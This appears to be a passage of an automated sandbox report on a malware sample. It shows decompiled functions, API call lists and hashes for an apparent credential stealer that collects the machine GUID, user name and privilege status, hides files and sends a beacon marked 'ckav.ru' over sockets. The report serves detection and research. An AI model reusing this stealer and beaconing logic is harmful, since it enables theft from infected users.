                                            				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                            				 *_t59( &_v48);
                                            				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                            				_t81 =  &_v24;
                                            				 *_t61( &_v24); // executed
                                            				_t63 = E00414059(); // executed
                                            				if(_t63 != 0) {
                                            					_t65 = E00413D97(0);
                                            					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                            					CreateMutexW(0, 1, _t65); // executed
                                            					_t68 = GetLastError();
                                            					_t92 = _t68 - 0xb7;
                                            					if(_t68 == 0xb7) {
                                            						E00413B81(0);
                                            						_pop(_t81); // executed
                                            					}
                                            					E00413003(_t92); // executed
                                            					E00412B2E(_t92); // executed
                                            					E00412D31(_t81, _t84); // executed
                                            					E00413B3F();
                                            					E00413B81(0);
                                            					 *0x49fdd0 = 1;
                                            				}
                                            				return 0;
                                             			}

                                             Statement address column (spilled from the side-by-side view of the decompiled code above): 0x0041386f 0x0041387e 0x00413885 0x00413889 0x0041388c 0x00413890 0x00413893 0x00413897 0x0041389a 0x0041389e 0x004138a1 0x004138a5 0x004138a8 0x004138ac 0x004138af 0x004138b2 0x004138b5 0x004138b8 0x004138bb 0x004138bc 0x004138c4 0x004138c8 0x004138cb 0x004138cf 0x004138d2 0x004138d6 0x004138d7 0x004138df 0x004138e3 0x004138e4 0x004138ea 0x004138eb 0x004138f1 0x004138f5 0x004138f9 0x004138fd 0x00413901 0x00413905 0x00413909 0x0041390d 0x00413911 0x00413915 0x00413919 0x0041391d 0x00413921 0x00413925 0x00413929 0x0041392d 0x00413931 0x00413935 0x00413939 0x0041393d 0x00413941 0x00413950 0x00413959 0x0041395f 0x00413968 0x0041396e 0x00413973 0x00413977 0x00413979 0x00413980 0x00413982 0x00413991 0x0041399c 0x0041399e 0x004139a4 0x004139a9 0x004139ac 0x004139b1 0x004139b1 0x004139b2 0x004139b7 0x004139bc 0x004139c1 0x004139c7 0x004139cd 0x004139cd 0x004139db

                                            APIs
                                            • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                            • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                            • GetLastError.KERNEL32 ref: 0041399E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Error$CreateLastModeMutex
                                            • String ID:
                                            • API String ID: 3448925889-0
                                            • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                            • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                            • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                            • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                            				long _v8;
                                            				void* _t7;
                                            				long _t10;
                                            				void* _t21;
                                            				struct _OVERLAPPED* _t24;
                                            
                                            				_t14 = __ebx;
                                            				_t24 = 0;
                                            				_v8 = 0;
                                            				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                            				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                            				_t21 = _t7;
                                            				if(_t21 != 0xffffffff) {
                                            					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                            					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                            					if(_t10 != 0xffffffff) {
                                            						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                            						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                            						_t24 =  !=  ? 1 : 0;
                                            					}
                                            					E00403C40(_t21); // executed
                                            				}
                                            				return _t24;
                                            			}

                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                            • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreatePointerWrite
                                            • String ID:
                                            • API String ID: 3672724799-0
                                            • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                            • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                            • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                            • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 34%
                                            			E00412D31(void* __ecx, void* __edi) {
                                            				long _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				char _v24;
                                            				char _v40;
                                            				void* __ebx;
                                            				intOrPtr* _t10;
                                            				void* _t11;
                                            				void* _t25;
                                            				void* _t26;
                                            				void* _t27;
                                            				void* _t35;
                                            				void* _t53;
                                            				char* _t57;
                                            				void* _t58;
                                            				void* _t61;
                                            				void* _t64;
                                            				void* _t65;
                                            				intOrPtr* _t66;
                                            				void* _t67;
                                            				void* _t68;
                                            				void* _t69;
                                            				void* _t70;
                                            				void* _t71;
                                            				void* _t72;
                                            				void* _t73;
                                            
                                            				_t53 = __ecx;
                                            				_t10 =  *0x49fde0;
                                            				_t68 = _t67 - 0x24;
                                            				 *0x49fddc = 0x927c0;
                                            				 *0x49fde4 = 0;
                                            				_t75 = _t10;
                                            				if(_t10 != 0) {
                                            					L16:
                                            					_push(1);
                                            					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                            					_t61 = _t11;
                                            					_t68 = _t68 + 0xc;
                                            					if(_t61 != 0) {
                                            						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                            						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                            					}
                                            					L004067C4(0xea60); // executed
                                            					_pop(_t53);
                                            				} else {
                                            					_push(__edi);
                                            					 *0x49fde0 = E004056BF(0x2bc);
                                            					E00413DB7(_t53, _t75,  &_v40);
                                            					_t57 =  &_v24;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					E004058D4( *0x49fde0, 0x12);
                                            					E004058D4( *0x49fde0, 0x28);
                                            					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                            					_t69 = _t68 + 0x28;
                                            					_t64 = E0040632F();
                                            					_push(0);
                                            					_push(1);
                                            					if(_t64 == 0) {
                                            						_push(0);
                                            						_push( *0x49fde0);
                                            						E00405872();
                                            						_t70 = _t69 + 0x10;
                                            					} else {
                                            						_push(_t64);
                                            						_push( *0x49fde0);
                                            						E00405872();
                                            						E00402BAB(_t64);
                                            						_t70 = _t69 + 0x14;
                                            					}
                                            					_t58 = E00406130(_t57);
                                            					_push(0);
                                            					_push(1);
                                            					_t77 = _t64;
                                            					if(_t64 == 0) {
                                            						_push(0);
                                            						_push( *0x49fde0);
                                            						_t25 = E00405872();
                                            						_t71 = _t70 + 0x10; // executed
                                            					} else {
                                            						_push(_t58);
                                            						_push( *0x49fde0);
                                            						E00405872();
                                            						_t25 = E00402BAB(_t58);
                                            						_t71 = _t70 + 0x14;
                                            					}
                                            					_t26 = E004061C3(_t25, 0, _t77); // executed
                                            					_t65 = _t26;
                                            					_push(0);
                                            					_push(1);
                                            					if(_t65 == 0) {
                                            						_push(0);
                                            						_push( *0x49fde0);
                                            						_t27 = E00405872();
                                            						_t72 = _t71 + 0x10;
                                            					} else {
                                            						_push(_t65);
                                            						_push( *0x49fde0);
                                            						E00405872();
                                            						_t27 = E00402BAB(_t65);
                                            						_t72 = _t71 + 0x14;
                                            					}
                                            					_t66 = E00406189(_t27);
                                            					_t79 = _t66;
                                            					if(_t66 == 0) {
                                            						E00405781( *0x49fde0, 0);
                                            						E00405781( *0x49fde0, 0);
                                            						_t73 = _t72 + 0x10;
                                            					} else {
                                            						E00405781( *0x49fde0,  *_t66);
                                            						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                            						E00402BAB(_t66);
                                            						_t73 = _t72 + 0x14;
                                            					}
                                            					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                                            					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                                            					_t35 = E0040642C(_t79); // executed
                                            					E004058D4( *0x49fde0, _t35);
                                            					E004058D4( *0x49fde0, _v24);
                                            					E004058D4( *0x49fde0, _v20);
                                            					E004058D4( *0x49fde0, _v16);
                                            					E004058D4( *0x49fde0, _v12);
                                            					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                            					_t68 = _t73 + 0x48;
                                            				}
                                            				_t80 =  *0x49fde4;
                                            				if( *0x49fde4 == 0) {
                                            					_t10 =  *0x49fde0;
                                            					goto L16;
                                            				}
                                            				return E00405695(_t53,  *0x49fde0);
                                            			}

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                              • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                              • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                              • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$CreateFreeProcessThread_wmemset
                                            • String ID: ckav.ru
                                            • API String ID: 2915393847-2696028687
                                            • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                            • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                            • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                            • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040632F() {
                                            				char _v8;
                                            				void* _t4;
                                            				void* _t7;
                                            				void* _t16;
                                            
                                            				_t16 = E00402B7C(0x208);
                                            				if(_t16 == 0) {
                                            					L4:
                                            					_t4 = 0;
                                            				} else {
                                            					E0040338C(_t16, 0, 0x104);
                                            					_t1 =  &_v8; // 0x4143e8
                                            					_v8 = 0x208;
                                            					_t7 = E00406069(_t16, _t1); // executed
                                            					if(_t7 == 0) {
                                            						E00402BAB(_t16);
                                            						goto L4;
                                            					} else {
                                            						_t4 = _t16;
                                            					}
                                            				}
                                            				return _t4;
                                            			}

                                            APIs
                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            • _wmemset.LIBCMT ref: 0040634F
                                              • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateNameProcessUser_wmemset
                                            • String ID: CA
                                            • API String ID: 2078537776-1052703068
                                            • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                            • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                            • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                            • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                            				int _t7;
                                            				void* _t8;
                                            
                                            				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                            				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                            				return _t7;
                                            			}

                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID: IDA
                                            • API String ID: 4114910276-365204570
                                            • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                            • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                            • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                            • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                                            				_Unknown_base(*)()* _t5;
                                            				void* _t6;
                                            
                                            				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                                            				_t1 =  &_a8; // 0x403173
                                            				_t5 = GetProcAddress(_a4,  *_t1); // executed
                                            				return _t5;
                                            			}

                                            APIs
                                            • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc
                                            • String ID: s1@
                                            • API String ID: 190572456-427247929
                                            • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                            • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                            • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                            • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E00404A52(void* _a4, char* _a8, char* _a12) {
                                            				void* _v8;
                                            				int _v12;
                                            				void* __ebx;
                                            				char* _t10;
                                            				long _t13;
                                            				char* _t27;
                                            
                                            				_push(_t21);
                                            				_t27 = E00402B7C(0x208);
                                            				if(_t27 == 0) {
                                            					L4:
                                            					_t10 = 0;
                                            				} else {
                                            					E00402B4E(_t27, 0, 0x208);
                                            					_v12 = 0x208;
                                            					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                                            					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                            					if(_t13 != 0) {
                                            						E00402BAB(_t27);
                                            						goto L4;
                                            					} else {
                                            						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                                            						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                                            						E00404A39(_v8); // executed
                                            						_t10 = _t27;
                                            					}
                                            				}
                                            				return _t10;
                                            			}

                                            APIs
                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                            • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 1425999871-0
                                            • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                            • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                            • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                            • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402BAB(void* _a4) {
                                            				void* _t3;
                                            				char _t5;
                                            
                                            				if(_a4 != 0) {
                                            					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                            					return _t5;
                                            				}
                                            				return _t3;
                                            			}

                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                            • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                            • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                            • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                            • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E004060BD(void* __eflags) {
                                            				signed int _v8;
                                            				char _v12;
                                            				short _v16;
                                            				char _v20;
                                            				void* __ebx;
                                            				intOrPtr* _t12;
                                            				signed int _t13;
                                            				intOrPtr* _t14;
                                            				signed int _t15;
                                            				void* _t24;
                                            
                                            				_v16 = 0x500;
                                            				_v20 = 0;
                                            				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                                            				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                            				_v8 = _t13;
                                            				if(_t13 != 0) {
                                            					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                                            					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                                            					asm("sbb eax, eax");
                                            					_v8 = _v8 &  ~_t15;
                                            					E0040604F(_v12);
                                            					return _v8;
                                            				}
                                            				return _t13;
                                            			}

                                            APIs
                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CheckMembershipToken
                                            • String ID:
                                            • API String ID: 1351025785-0
                                            • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                            • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                            • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                            • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                            				void* _t3;
                                            				int _t5;
                                            
                                            				_t3 = E00403D4D(__eflags, _a4); // executed
                                            				if(_t3 == 0) {
                                            					__eflags = 0;
                                            					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                                            					_t5 = CreateDirectoryW(_a4, 0); // executed
                                            					return _t5;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}

                                            APIs
                                            • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateDirectory
                                            • String ID:
                                            • API String ID: 4241100979-0
                                            • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                            • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                            • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                            • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E0040642C(void* __eflags) {
                                            				short _v40;
                                            				intOrPtr* _t6;
                                            				void* _t10;
                                            
                                            				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                                            				 *_t6( &_v40); // executed
                                            				return 0 | _v40 == 0x00000009;
                                            			}

                                            APIs
                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InfoNativeSystem
                                            • String ID:
                                            • API String ID: 1721193555-0
                                            • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                            • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                            • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                            • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				intOrPtr _t5;
                                            
                                            				_t5 = _a12;
                                            				if(_t5 == 0) {
                                            					_t5 = E00405D0B(_a8) + 1;
                                            				}
                                            				__imp__#19(_a4, _a8, _t5, 0); // executed
                                            				return _t5;
                                            			}

                                            APIs
                                            • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                            • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                            • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                            • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                            				int _t6;
                                            				void* _t7;
                                            
                                            				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                            				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                            				return _t6;
                                            			}

                                            APIs
                                            • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                            • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                            • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                            • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Startup
                                            • String ID:
                                            • API String ID: 724789610-0
                                            • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                            • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                            • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                            • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040427D(WCHAR* _a4) {
                                            				int _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                                            				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                            				return _t4;
                                            			}

                                            APIs
                                            • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                            • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                            • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                            • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404A19(void* _a4, short* _a8, void** _a12) {
                                            				long _t5;
                                            				void* _t6;
                                            
                                            				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                            				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                            				return _t5;
                                            			}

                                            APIs
                                            • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                            • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
